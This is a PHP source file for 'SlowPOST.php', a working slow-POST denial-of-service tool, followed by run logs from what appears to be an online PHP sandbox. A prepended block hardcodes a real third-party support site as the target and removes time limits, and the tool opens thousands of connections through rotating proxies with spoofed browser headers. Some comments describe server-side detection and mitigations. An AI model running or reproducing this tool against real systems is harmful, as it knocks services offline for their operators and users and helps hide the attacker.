<?php
// Remove PHP's execution-time limit so the script only stops when it is killed.
set_time_limit(0);
// Keep executing even if the invoking client disconnects.
ignore_user_abort(true);
// Overwrites the first CLI argument. The main code reads argv[1] as the target URL,
// so this value is used regardless of the command line and the interactive prompts are skipped.
$_SERVER['argv'][1] = 'http://support.ioncube.com/winapp/';
?><?php
/**
* Exploit Title: SlowPOST.php - POST Denial-Of-Service [v1.9.2]
*
* Date: 13.05.2013
* Author: NewEraCracker
* License: Public Domain
*
* How to run using php command line:
* Linux : php-cli SlowPOST.php
* Windows : php SlowPOST.php
*
* This exploit might expose your IP Address in server logs. Be aware.
*/
//-------------------------
// CONFiG
//-------------------------
// Number of cookie strings fetched from the target before any POST is sent.
$CONFIG['max_cookies'] = 20;
// Upper bound of the socket-slot loop in the main code, i.e. how many connections the script tries to hold.
$CONFIG['max_sockets'] = 9001;
// Passed to stream_set_timeout() as its third (microseconds) argument in openCustomSocket().
$CONFIG['timeout_ms'] = 500;
// Passed to usleep() before each body fragment in slowPostContinue(); values <= 0 skip the pause.
$CONFIG['usleep_time'] = 10;
//-------------------------
// INiT
//-------------------------
// Define EXPLOIT_VERSION
if(!defined('EXPLOIT_VERSION'))
define('EXPLOIT_VERSION', 'v1.9.2');
// Define STDIN (only missing when the SAPI does not provide it)
if(!defined('STDIN'))
define('STDIN', fopen('php://stdin', 'r'));
// Check SAPI: the script refuses to run outside the command-line interpreter
if(PHP_SAPI != 'cli') {
echo 'This script is not meant to be ran via browser.';
exit(1);
}
// Check PHP Version
if(version_compare(PHP_VERSION, '5.0.4') < 0) {
echo 'This support only supports PHP 5.0.4 and higher.';
exit(1);
}
// Globals - DO NOT EDIT
// List of array('host' => ..., 'port' => ...) entries filled by proxyLoadFile().
$global_proxy_array = array();
//-------------------------
// FUNCTiONS FOR THE LULZ
//-------------------------
/**
 * Read a single line from the STDIN stream.
 *
 * @return string|false The line with surrounding whitespace trimmed,
 *                      or false when the STDIN handle is not usable.
 */
function readSTDIN() {
    $stream = STDIN;
    if ($stream) {
        return trim(fgets($stream));
    }
    return false;
}
/**
 * Parse a "host:port" list file and append every entry to $global_proxy_array.
 *
 * Lines without a ':' separator are skipped. Prints a message and exits with
 * status 1 when the file name is empty or the file cannot be read / is empty.
 *
 * @param string $filename Path of the list file (backslashes are normalised to '/').
 * @return void
 */
function proxyLoadFile($filename) {
    global $global_proxy_array;

    // Normalise Windows-style separators before touching the filesystem
    $filename = str_replace('\\', '/', $filename);
    $raw = @file_get_contents($filename);
    if (!$filename || !$raw) {
        echo $filename.' is not a valid proxy-list file!';
        exit(1);
    }

    // Unify line endings, then walk the file line by line
    $lines = explode("\n", str_replace(array("\r\n", "\r"), "\n", $raw));
    foreach ($lines as $line) {
        $parts = explode(':', $line);
        if (!isset($parts[0], $parts[1])) {
            continue;
        }
        $global_proxy_array[] = array(
            'host' => trim($parts[0]),
            'port' => (int)(trim($parts[1])),
        );
    }
}
/**
 * Pick one entry of $global_proxy_array at random.
 *
 * @return array|false An array with 'host' and 'port' keys, or false when the list is empty.
 */
function proxyGetRandom() {
    global $global_proxy_array;

    $total = count($global_proxy_array);
    if (!$total) {
        return false;
    }

    // Retry until the drawn index actually holds an entry
    do {
        $idx = mt_rand(0, $total - 1);
        $pick = isset($global_proxy_array[$idx]) ? $global_proxy_array[$idx] : null;
    } while (!$pick);

    return $pick;
}
/**
 * Build a User-Agent string from fixed tables of Windows NT, Internet Explorer
 * and Firefox versions.
 *
 * The string is always one of two templates (MSIE/Trident or Gecko/Firefox)
 * filled from these short lists, so the set of possible values is small and
 * enumerable.
 *
 * @return string
 */
function randomUserAgent() {
    // Windows NT version token
    $ntVersions = array('5.0', '5.1', '5.2', '6.0', '6.1', '6.2');
    $nt = $ntVersions[mt_rand(0, count($ntVersions) - 1)];

    // Coin flip between the two browser families
    if (!mt_rand(0, 1)) {
        // Firefox: the same version is used for rv: and Firefox/
        $firefox = array('17.0', '18.0', '19.0', '20.0', '21.0');
        $ver = $firefox[mt_rand(0, count($firefox) - 1)];
        return "Mozilla/5.0 (Windows NT {$nt}; rv:{$ver}) Gecko/20100101 Firefox/{$ver}";
    }

    // Internet Explorer rows: Mozilla version, MSIE version, Trident version
    $ieRows = array(
        array('4.0', '7.0', '4.0'),
        array('4.0', '8.0', '4.0'),
        array('5.0', '9.0', '5.0'),
        array('5.0', '10.0', '6.0'),
    );
    list($moz, $msie, $trident) = $ieRows[mt_rand(0, count($ieRows) - 1)];
    return "Mozilla/{$moz} (compatible; MSIE {$msie}; Windows NT {$nt}; Trident/{$trident})";
}
/**
 * Open one non-blocking stream socket to the proxy if one is given, otherwise to the target.
 *
 * $newEraUrl / $newEraProxy are read through their ->ssl, ->name and ->port properties.
 * Returns the stream resource, or false when fsockopen() fails.
 */
function openCustomSocket($newEraUrl, $newEraProxy = null) {
global $CONFIG;
// Caps the connect phase at one second for sockets opened without an explicit timeout
@ini_set('default_socket_timeout', 1);
// Connect to the proxy when present, else straight to the target host
$newEraConnection = (($newEraProxy == null) ? $newEraUrl : $newEraProxy);
// ssl:// wraps the TCP connection in TLS; tcp:// is a plain connection
$host = (($newEraConnection->ssl) ? 'ssl://' : 'tcp://').$newEraConnection->name;
$fp = @fsockopen($host, $newEraConnection->port);
if(!$fp)
return false;
// Non-blocking mode: later fwrite() calls return without waiting on the peer
stream_set_blocking($fp, 0);
// 0 seconds plus $CONFIG['timeout_ms'] passed in the microseconds argument
stream_set_timeout($fp, 0, $CONFIG['timeout_ms']);
return $fp;
}
/**
 * Writes the request line and headers of a POST to $sock and nothing else.
 *
 * The headers announce a random Content-Length between 1337 and 133700, while
 * the body itself is left for later calls to slowPostContinue().
 * Returns that Content-Length, or false when $sock is not usable.
 *
 * Defensive notes: a server sees a complete header block followed by a body that
 * arrives far more slowly than the announced length implies. Request-body read
 * timeouts / minimum data rates (e.g. Apache mod_reqtimeout RequestReadTimeout,
 * nginx client_body_timeout) and per-client connection limits are the controls
 * that bound how long such a connection can occupy a worker.
 */
function slowPostStart($sock, $newEraUrl, $newEraProxy, $cookie) {
// Check the socket
if(!$sock)
return false;
// Generate a random Content-Length
$length = mt_rand(1337, 133700);
// Build: the absolute URL is used as request target when going through a proxy, the path otherwise
$header = 'POST '.($newEraProxy ? $newEraUrl->full_url : $newEraUrl->path).' HTTP/1.1'."\r\n";
$header .= 'Host: '.$newEraUrl->name."\r\n";
$header .= 'Connection: Keep-Alive'."\r\n";
// Detection aid: the header value itself starts with the literal text "Accept: ",
// a static artefact that log queries or WAF/IDS rules can match on.
$header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$header .= 'User-Agent: '.randomUserAgent()."\r\n";
$header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$header .= 'Accept-Encoding: gzip,deflate'."\r\n";
$header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n";
$header .= 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8'."\r\n";
// Referer is sent on roughly half of the requests and always equals the request URL
$header .= mt_rand(0, 1) ? 'Referer: '.$newEraUrl->full_url."\r\n" : '';
$header .= ($cookie ? "Cookie: {$cookie}\r\n" : '');
$header .= 'Content-Length: '.$length."\r\n";
// Blank line ends the header block; no body bytes follow in this function
$header .= "\r\n";
// Do it (the fwrite result is not checked, so a failed write still returns $length)
@fwrite($sock, $header);
return $length;
}
/**
 * Writes one small fragment of request body to $sock.
 *
 * The fragment is $bytes random printable ASCII characters (codes 33-126),
 * URL-encoded before being written. Returns true after the write attempt, or
 * false when $sock is not usable.
 *
 * Defensive note: each call moves only a handful of body bytes, so the body
 * data rate per connection is what a server-side minimum-rate or body-timeout
 * setting has to measure.
 */
function slowPostContinue($sock, $bytes = 5) {
global $CONFIG;
// Check the socket
if(!$sock)
return false;
// Check the $bytes: non-integer values fall back to 5
if(intval($bytes) != $bytes)
$bytes = 5;
// Throttle execution speed slightly (usleep() takes microseconds)
if($CONFIG['usleep_time'] > 0)
@usleep($CONFIG['usleep_time']);
// Build the fragment one random character at a time
$tmp = '';
for($j = 0; $j < $bytes; $j++)
$tmp .= chr(mt_rand(33, 126));
// The fwrite result is not checked
@fwrite($sock, urlencode($tmp));
return true;
}
//-------------------------
// CLASSES FOR THE LULZ
//-------------------------
/**
 * Fetches Set-Cookie values from the target with plain GET requests and keeps
 * them as ready-made Cookie header strings for the later POST requests.
 *
 * Defensive note: on the server this phase appears as a short burst of GET
 * requests (one per stored cookie) that precedes the POST connections.
 */
class NewEraCookies {
// Number of cookie strings to collect; also the upper bound for random lookups
private $max_cookies;
// Cookie header strings indexed 0..max_cookies-1; an entry is '' or false when a fetch produced nothing
private $cookies = array();
/** Constructor: delegates to update_object() */
public function __construct($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) {
$this->update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile, $output);
}
/**
 * Discards stored cookies and fetches $max_cookies new ones.
 * When $proxyFile is truthy a random proxy is selected for every fetch;
 * when $output is truthy a progress line is echoed.
 */
public function update_object($newEraUrl, $newEraProxy, $max_cookies, $proxyFile = null, $output = false) {
$this->max_cookies = $max_cookies;
$this->cookies = array();
if($output)
echo PHP_EOL.'BUILDING COOKIES ';
for($i = 0; $i < $this->max_cookies; $i++) {
// Using Proxy file?
if($proxyFile) {
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxyFile.' is not a valid proxy-list file!');
// Re-points the shared proxy object at the newly drawn entry
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
$this->cookies[$i] = self::cookieGrab($newEraUrl, $newEraProxy);
// One dot per fetch attempt, whether or not a cookie was obtained
if($output)
echo '.';
}
}
/** Returns the cookie string at $idx ('random' picks an index), or '' when the slot is not set */
public function returnCookieByIndex($idx) {
if($idx == 'random')
$idx = mt_rand(0, $this->max_cookies - 1);
if(isset($this->cookies[$idx]))
return $this->cookies[$idx];
return '';
}
/**
 * Parses Set-Cookie lines out of an array of response header lines.
 * Returns a list with one array per cookie: ['value' => ['key' => ..., 'value' => ...]]
 * plus any of domain / expires / path / secure / comment that were present.
 */
public static function cookieParse($header) {
$cookies = array();
foreach($header as $line) {
if(preg_match('/^Set-Cookie: /i', $line)) {
$line = preg_replace('/^Set-Cookie: /i', '', trim($line));
$csplit = explode(';', $line);
$cdata = array();
$grabbed_cookie_data = false;
foreach($csplit as $data) {
// NOTE(review): $cinfo[1] is read below without checking that an '=' was present,
// and a value containing '=' is split further - confirm against real responses.
$cinfo = explode('=', $data);
$cinfo[0] = trim($cinfo[0]);
// The first ';'-separated pair is the cookie name and value
if(!$grabbed_cookie_data) {
$cdata['value']['key'] = $cinfo[0];
$cdata['value']['value'] = $cinfo[1];
$grabbed_cookie_data = true;
continue;
}
// Everything after the first pair is treated as an attribute
$cinfo[0] = strtolower($cinfo[0]);
if($cinfo[0] == 'expires') $cinfo[1] = @strtotime($cinfo[1]);
if($cinfo[0] == 'secure') $cinfo[1] = 'true';
if(in_array($cinfo[0], array('domain', 'expires', 'path', 'secure', 'comment'))) {
$cdata[$cinfo[0]] = $cinfo[1];
}
}
$cookies[] = $cdata;
}
}
return $cookies;
}
/**
 * Joins parsed cookies into a "name=value; name=value" request header value.
 * Returns false when $data is not an array or holds no cookies.
 */
public static function cookieBuild($data) {
if(is_array($data)) {
$cookie = array();
foreach($data as $d)
$cookie[] = $d['value']['key'].'='.$d['value']['value'];
if(count($cookie) > 0)
return trim(implode('; ', $cookie));
}
return false;
}
/**
 * Issues one GET to the target (optionally through a proxy) via PHP's http
 * stream wrapper and returns the cookies of the response as a header value.
 * Returns '' when the request could not be opened.
 */
public static function cookieGrab($newEraUrl, $newEraProxy = null) {
// Build connection header
$header = 'Host: '.$newEraUrl->name."\r\n";
$header .= 'Connection: Keep-Alive'."\r\n";
// Same literal "Accept: Accept:" artefact as in the POST headers
$header .= 'Accept: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'."\r\n";
$header .= 'User-Agent: '.randomUserAgent()."\r\n";
$header .= 'Accept-Language: en-US;q=0.8,en;q=0.6'."\r\n";
$header .= 'Accept-Encoding: gzip,deflate'."\r\n";
$header .= 'Keep-Alive: '.mt_rand(60, 120)."\r\n";
// Check proxy url
if($newEraProxy) {
// Enable proxy
$proxy_url = $newEraProxy->full_url;
$request_fulluri = true;
} else {
// Disable proxy
$proxy_url = '';
$request_fulluri = false;
}
// Build stream context
$context = stream_context_create(array(
'http' => array(
'method' => 'GET',
// Seconds
'timeout' => (3),
'header' => $header,
'proxy' => $proxy_url,
'request_fulluri' => $request_fulluri,
// Redirects are not followed
'max_redirects' => (0),
'protocol_version' => (1.1),
// Error status codes still yield a readable stream, so their headers are parsed too
'ignore_errors' => true
),
'ssl' => array(
// TLS certificate verification is switched off for this request
'verify_peer' => false
)
));
// Default result when the request cannot be opened
$cookie = '';
$handle = @fopen($newEraUrl->full_url, 'r', false, $context);
if($handle) {
// For the http wrapper, wrapper_data holds the response header lines
$metadata = stream_get_meta_data($handle);
$cookie = self::cookieBuild(self::cookieParse($metadata['wrapper_data']));
// The response body is never read
@fclose($handle);
}
return $cookie;
}
}
/**
 * Minimal URL holder: splits "scheme://host[:port]/path" into its parts and
 * exposes them read-only as ->full_url, ->protocol, ->ssl, ->name, ->port and ->path.
 */
class NewEraUrl {
    private $host_full_url;
    private $host_protocol;
    private $host_ssl;
    private $host_name;
    private $host_port;
    private $host_path;

    /**
     * @param string $host_full_url Absolute http:// or https:// URL.
     */
    public function __construct($host_full_url) {
        $this->update_object($host_full_url);
    }

    /**
     * Re-parse the object from a new URL.
     *
     * An explicit port is stored as the string found in the URL; otherwise the
     * integer default 443 (https) or 80 (http) is used.
     *
     * @param string $host_full_url
     * @return void
     */
    public function update_object($host_full_url) {
        $isHttps = (strpos($host_full_url, 'https') === 0);

        $this->host_full_url = $host_full_url;
        $this->host_ssl = $isHttps;
        $this->host_protocol = $isHttps ? 'https' : 'http';

        // "scheme:", "", "host[:port]", "rest of the URL"
        $segments = explode('/', $host_full_url, 4);
        $authority = explode(':', $segments[2], 2);

        $this->host_name = $authority[0];
        if (isset($authority[1])) {
            $this->host_port = $authority[1];
        } else {
            $this->host_port = $isHttps ? 443 : 80;
        }
        $this->host_path = '/'.(isset($segments[3]) ? $segments[3] : '');
    }

    /**
     * Read-only access to the private host_* properties by their short name.
     *
     * @param string $var Property name without the "host_" prefix.
     * @return mixed The value, or null for unknown / unset properties.
     */
    public function __get($var) {
        $property = 'host_'.$var;
        return isset($this->{$property}) ? $this->{$property} : null;
    }

    /**
     * Prefix check only: the URL must start with https:// or http://.
     *
     * @param string $host_full_url
     * @return true|null true when the prefix matches, null otherwise.
     */
    public static function isValid($host_full_url) {
        foreach (array('https://', 'http://') as $scheme) {
            if (strpos($host_full_url, $scheme) === 0) {
                return true;
            }
        }
        return null;
    }
}
/**
 * Minimal proxy endpoint holder: parses "[scheme://]host[:port]" and exposes
 * the parts read-only as ->full_url, ->protocol, ->ssl, ->name and ->port.
 */
class NewEraProxy {
    private $proxy_full_url;
    private $proxy_protocol;
    private $proxy_ssl;
    private $proxy_name;
    private $proxy_port;

    /**
     * @param string $proxy_full_url Endpoint such as "tcp://host:port".
     */
    public function __construct($proxy_full_url) {
        $this->update_object($proxy_full_url);
    }

    /**
     * Re-parse the object from a new endpoint string.
     *
     * The port is always stored as an integer; it defaults to 443 for ssl
     * endpoints and to 80 otherwise.
     *
     * @param string $proxy_full_url
     * @return void
     */
    public function update_object($proxy_full_url) {
        $overTls = (strpos($proxy_full_url, 'ssl') === 0);

        $this->proxy_full_url = $proxy_full_url;
        $this->proxy_ssl = $overTls;
        $this->proxy_protocol = $overTls ? 'ssl' : 'tcp';

        // Drop the "scheme://" part when there is one
        $schemeEnd = strpos($proxy_full_url, '://');
        $hostPort = ($schemeEnd !== false) ? substr($proxy_full_url, $schemeEnd + 3) : $proxy_full_url;
        $pieces = explode(':', $hostPort);

        $this->proxy_name = $pieces[0];
        if (isset($pieces[1])) {
            $port = $pieces[1];
        } else {
            $port = $overTls ? '443' : '80';
        }
        $this->proxy_port = (int)($port);
    }

    /**
     * Read-only access to the private proxy_* properties by their short name.
     *
     * @param string $var Property name without the "proxy_" prefix.
     * @return mixed The value, or null for unknown / unset properties.
     */
    public function __get($var) {
        $property = 'proxy_'.$var;
        return isset($this->{$property}) ? $this->{$property} : null;
    }
}
//-------------------------
// MAiN CODE FOR THE LULZ
//-------------------------
// Startup banner; together with the version line below it is the first output of every run
echo "
_______. __ ______ ____ __ ____
/ || | / __ \ \ \ / \ / /
| (----`| | | | | | \ \/ \/ /
\ \ | | | | | | \ /
.----) | | `----.| `--' | \ /\ /
|_______/ |_______| \______/ \__/ \__/
.______ ______ _______.___________.
| _ \ / __ \ / | |
| |_) | | | | | | (----`---| |----`
| ___/ | | | | \ \ | |
| | | `--' | .----) | | |
| _| \______/ |_______/ |__|
";
echo PHP_EOL.EXPLOIT_VERSION.' by NewEraCracker'.PHP_EOL;
// Fetch the URL to attack: argv[1] is accepted only if it starts with http:// or https://
$url = null;
if(isset($_SERVER['argv'][1]) && NewEraUrl::isValid($_SERVER['argv'][1]))
$url = $_SERVER['argv'][1];
// Fetch proxy to use: argv[2] is either "host:port" or the path of a readable proxy-list file
$proxy['host'] = null;
$proxy['port'] = null;
$proxy['file'] = false;
if(!empty($url) && isset($_SERVER['argv'][2])) {
// NOTE(review): this assignment replaces the whole $proxy array, including the defaults set above
if($proxy = explode(':', $_SERVER['argv'][2])) {
if(isset($proxy[0], $proxy[1])) {
$proxy['file'] = false;
$proxy['host'] = $proxy[0];
$proxy['port'] = (int)($proxy[1]);
unset($proxy[0], $proxy[1]);
}
}
if(!(isset($proxy['host'], $proxy['port'])) && is_readable($_SERVER['argv'][2])) {
$proxy['file'] = true;
$proxy['filename'] = $_SERVER['argv'][2];
}
}
// Ask for proxy (interactive path, only reached when no valid URL came from argv)
if(empty($url) && (empty($proxy['host']) || empty($proxy['port'])) && !$proxy['file']) {
$proxy['use'] = null;
while(!$proxy['use']) {
echo PHP_EOL.'Do you want to use a proxy [yes/no/file]: ';
$proxy['use'] = readSTDIN();
// Only the first letter of the answer is evaluated
if(strpos(strtolower($proxy['use']), 'n') === 0) {
break;
} elseif(strpos(strtolower($proxy['use']), 'y') === 0) {
echo PHP_EOL.'Proxy IP: ';
$proxy['host'] = readSTDIN();
echo PHP_EOL.'Proxy Port: ';
$proxy['port'] = (int)(readSTDIN());
} elseif(strpos(strtolower($proxy['use']), 'f') === 0) {
echo PHP_EOL.'Proxy file: ';
$proxy['filename'] = readSTDIN();
if(is_readable($proxy['filename'])) {
$proxy['file'] = true;
} else {
echo PHP_EOL.'Invalid file!'.PHP_EOL;
$proxy['use'] = null;
}
} else {
$proxy['use'] = null;
echo PHP_EOL.'Invalid choice!'.PHP_EOL;
}
}
unset($proxy['use']);
}
// Ask for target URL until the input passes the http:// / https:// prefix check
while(!$url) {
echo PHP_EOL.'Target url: ';
$url = readSTDIN();
if(NewEraUrl::isValid($url)) break;
$url = null;
echo PHP_EOL.'Invalid target!'.PHP_EOL;
}
// Init proxy support: fixed host:port, a random entry from the list file, or no proxy at all
if(empty($proxy['host']) || empty($proxy['port'])) {
$newEraProxy = null;
if(!empty($proxy['file'])) {
proxyLoadFile($proxy['filename']);
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
$newEraProxy = new NewEraProxy('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
} else {
$newEraProxy = new NewEraProxy('tcp://'.$proxy['host'].':'.$proxy['port']);
}
// Init the others
$newEraUrl = new NewEraUrl($url);
// The constructor performs the cookie-collection GET requests immediately (progress output enabled)
$newEraCookies = new NewEraCookies($newEraUrl, $newEraProxy, $CONFIG['max_cookies'], $proxy['file'], true);
// Start
echo PHP_EOL.'IMMA FIRIN MAH LAZOR ';
// Tracked connections: slot index => array('sock' => stream, 'length' => body bytes still to send)
$fp = array();
// Main loop. It never terminates on its own; the recorded runs below end with exit code 137.
//
// Defensive summary: the steady state is up to $CONFIG['max_sockets'] concurrent POST
// connections, each with complete headers and a body that advances by at most five
// characters per pass. Server-side indicators are many connections from few sources
// sitting in the request-body read state; the bounding controls are body read timeouts /
// minimum data rates and per-client connection limits (e.g. Apache RequestReadTimeout,
// nginx client_body_timeout and limit_conn).
while(1) {
for($i = 0; $i < $CONFIG['max_sockets']; $i++) {
// Using Proxy file?
if($proxy['file']) {
$newproxy = proxyGetRandom();
if(!$newproxy)
exit($proxy['filename'].' is not a valid proxy-list file!');
$newEraProxy->update_object('tcp://'.$newproxy['host'].':'.$newproxy['port']);
}
// Open a new socket
$tmp = array();
if($tmp['sock'] = openCustomSocket($newEraUrl, $newEraProxy)) {
// Progress bar: one dot per successfully opened connection
echo '.';
// Start a new slowPost and find its length
if($tmp['length'] = slowPostStart($tmp['sock'], $newEraUrl, $newEraProxy, $newEraCookies->returnCookieByIndex('random'))) {
if(isset($fp[$i], $fp[$i]['sock'])) {
// Close connection in the global socket array if it is being used
@fclose($fp[$i]['sock']);
unset($fp[$i]);
}
// Save the new socket in the global socket array
$fp[$i] = $tmp;
} else {
// Header write could not be started; drop the socket
@fclose($tmp['sock']);
}
}
unset($tmp);
// Check the current sockets: this sweep over every tracked connection runs once per slot iteration
foreach($fp as $k => $v) {
if($fp[$k]['length'] > 0) {
// Continue old slowPosts with at most 5 characters, fewer when less remains
$tmp = ($fp[$k]['length'] < 5) ? $fp[$k]['length'] : 5;
slowPostContinue($fp[$k]['sock'], $tmp);
$fp[$k]['length'] -= $tmp;
} else {
// Close completed slowPosts
@fclose($fp[$k]['sock']);
unset($fp[$k]);
}
}
}
}
?>
- Output for 7.1.10, 7.2.0 - 7.2.33, 7.3.12 - 7.3.33, 7.4.0 - 7.4.33, 8.0.0 - 8.0.28, 8.1.0 - 8.1.19, 8.2.0 - 8.2.6
- _______. __ ______ ____ __ ____
/ || | / __ \ \ \ / \ / /
| (----`| | | | | | \ \/ \/ /
\ \ | | | | | | \ /
.----) | | `----.| `--' | \ /\ /
|_______/ |_______| \______/ \__/ \__/
.______ ______ _______.___________.
| _ \ / __ \ / | |
| |_) | | | | | | (----`---| |----`
| ___/ | | | | \ \ | |
| | | `--' | .----) | | |
| _| \______/ |_______/ |__|
v1.9.2 by NewEraCracker
BUILDING COOKIES ....................
IMMA FIRIN MAH LAZOR
Process exited with code 137.
- Output for 7.0.20, 7.1.5 - 7.1.7
- _______. __ ______ ____ __ ____
/ || | / __ \ \ \ / \ / /
| (----`| | | | | | \ \/ \/ /
\ \ | | | | | | \ /
.----) | | `----.| `--' | \ /\ /
|_______/ |_______| \______/ \__/ \__/
.______ ______ _______.___________.
| _ \ / __ \ / | |
| |_) | | | | | | (----`---| |----`
| ___/ | | | | \ \ | |
| | | `--' | .----) | | |
| _| \______/ |_______/ |__|
v1.9.2 by NewEraCracker
BUILDING COOKIES ......
Process exited with code 137.